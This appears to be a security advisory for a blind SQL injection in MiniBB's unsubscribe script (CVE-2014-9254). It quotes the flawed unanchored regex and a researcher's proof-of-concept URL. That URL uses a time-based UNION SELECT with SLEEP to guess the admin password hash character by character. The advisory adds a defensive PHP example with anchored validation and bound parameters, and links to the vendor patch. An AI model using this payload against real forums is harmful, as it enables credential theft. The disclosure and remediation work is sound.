MiniBB "code" SQL Injection Vulnerability
Release date:
Updated on:
Affected Systems:
MiniBB <3.1
Description:
CVE (CAN) ID: CVE-2014-9254
MiniBB is an independent and open-source online forum constructor.
In versions earlier than MiniBB 3.1, when "action" is set to "unsubscribe", the "code" parameter of bb_func_unsub.php is not properly validated before it is used in a database query. An attacker can inject arbitrary SQL code through this parameter and manipulate the resulting SQL query.
<* Source: Kacper Szurek
Link: http://secunia.com/advisories/61794/
*>
Test method:
Alert
The following procedures (methods) may be offensive in nature and are intended only for security research and teaching. Users bear all risk themselves!
# Exploit Title: MiniBB 3.1 Blind SQL Injection
# Date: 23-11-2014
# Software Link: http://www.minibb.com/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9254
# Category: webapps
1. Description
preg_match() only checks whether $_GET['code'] contains at least one letter or digit (missing ^ and $ inside the regexp).
File: bb_func_unsub.php
$usrid = (isset($_GET['usrid']) ? $_GET['usrid'] + 0 : 0);
$allowUnsub = FALSE;
$chkCode = FALSE;
if (isset($_GET['code']) and preg_match("#[a-zA-Z0-9]+#", $_GET['code'])) {
    // Trying to unsubscribe directly from email
    $chkField = 'email_code';
    $chkVal = $_GET['code'];
    $userCondition = TRUE;
    $chkCode = TRUE;
}
else {
    // Manual unsubscribe
    $chkField = 'user_id';
    $chkVal = $user_id;
    $userCondition = ($usrid == $user_id);
}
if ($topic != 0 and $usrid > 0 and $userCondition and $ids = db_simpleSelect(0, $Ts, 'id, user_id', 'topic_id', '=', $topic, '', '', $chkField, '=', $chkVal))
http://security.szurek.pl/minibb-31-blind-sql-injection.html
2. Proof of Concept
http://minibb-url/index.php?action=unsubscribe&usrid=1&topic=1&code=test'union SELECT 1,IF(substr(user_password,1,1)=CHAR(99),SLEEP(5),0) FROM minibbtable_users WHERE user_id=1 AND username!='
This SQL will check if the first password character of user ID = 1 is "c".
If yes, it will sleep 5 seconds.
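The root cause is the unanchored pattern, which accepts any value that contains one alphanumeric character somewhere, after which the raw value reaches the query. The following is an added defender's example, not MiniBB's own code and not part of the original advisory or exploit write-up: it puts the unanchored check beside an anchored one, and shows a lookup that binds the value as a query parameter instead of concatenating it. The database table, its rows, the column names and the pdo_sqlite in-memory database are all assumptions constructed for the demonstration; they stand in for the forum's real MySQL table.

```php
<?php
// Added example (not MiniBB code). Demonstrates why the unanchored regex in
// bb_func_unsub.php lets a quote-bearing value through, and how an anchored
// regex plus a parameterised query closes the hole.

// Original style of check: passes if ANY alphanumeric run occurs anywhere in the value.
function codeLooksValidUnanchored(string $code): bool {
    return preg_match('#[a-zA-Z0-9]+#', $code) === 1;
}

// Hardened check: the WHOLE value must be alphanumeric (no quotes, spaces, etc.).
function codeLooksValidAnchored(string $code): bool {
    return preg_match('#^[a-zA-Z0-9]+$#', $code) === 1;
}

// Constructed sample inputs: a genuine-looking unsubscribe code, a value that
// smuggles a quote, an empty string and a path-like string.
$samples = ['abc123XYZ', "test' OR 1=1 -- ", '', '../etc/passwd'];
foreach ($samples as $s) {
    printf("%-22s unanchored=%-6s anchored=%s\n", json_encode($s),
        codeLooksValidUnanchored($s) ? 'pass' : 'reject',
        codeLooksValidAnchored($s) ? 'pass' : 'reject');
}

// Parameterised lookup. Assumption: the pdo_sqlite extension is available; an
// in-memory SQLite table with constructed rows stands in for the MySQL table.
function findSubscription(PDO $db, int $topic, string $chkField, string $chkVal): ?array {
    // Column names must come from a fixed allow-list, never from the request.
    $allowedFields = ['email_code', 'user_id'];
    if (!in_array($chkField, $allowedFields, true)) {
        throw new InvalidArgumentException('unexpected lookup column');
    }
    // The value is bound as a parameter, so a quote inside it is data, not SQL.
    $stmt = $db->prepare(
        "SELECT id, user_id FROM subscriptions WHERE topic_id = :topic AND {$chkField} = :val"
    );
    $stmt->execute([':topic' => $topic, ':val' => $chkVal]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE subscriptions (id INTEGER PRIMARY KEY, topic_id INTEGER, user_id INTEGER, email_code TEXT)');
$db->exec("INSERT INTO subscriptions (topic_id, user_id, email_code) VALUES (1, 1, 'abc123XYZ')");

// Legitimate code: the row is found. Quote-bearing value: bound as a literal
// string, it matches nothing and no attacker-controlled SQL is executed.
var_dump(findSubscription($db, 1, 'email_code', 'abc123XYZ'));
var_dump(findSubscription($db, 1, 'email_code', "test' OR 1=1 -- "));
```

Run it with the PHP CLI; the first loop prints which inputs each regex accepts (only the anchored one rejects the quote-bearing value), and the two var_dump calls show the bound lookup returning the constructed row for the real code and null for the other. Both measures belong together: the anchored regex keeps the value in the expected shape, and the bound parameter means the query stays correct even if the validation is later loosened.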
3. Solution:
http://www.minibb.com/forums/news-9/blind-sql-injection-fix-6430.html
Suggestion:
Vendor patch:
MiniBB
------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
MiniBB:
http://www.minibb.com/forums/news-9/blind-sql-injection-fix-6430.html
Kacper Szurek:
http://security.szurek.pl/minibb-31-blind-sql-injection.html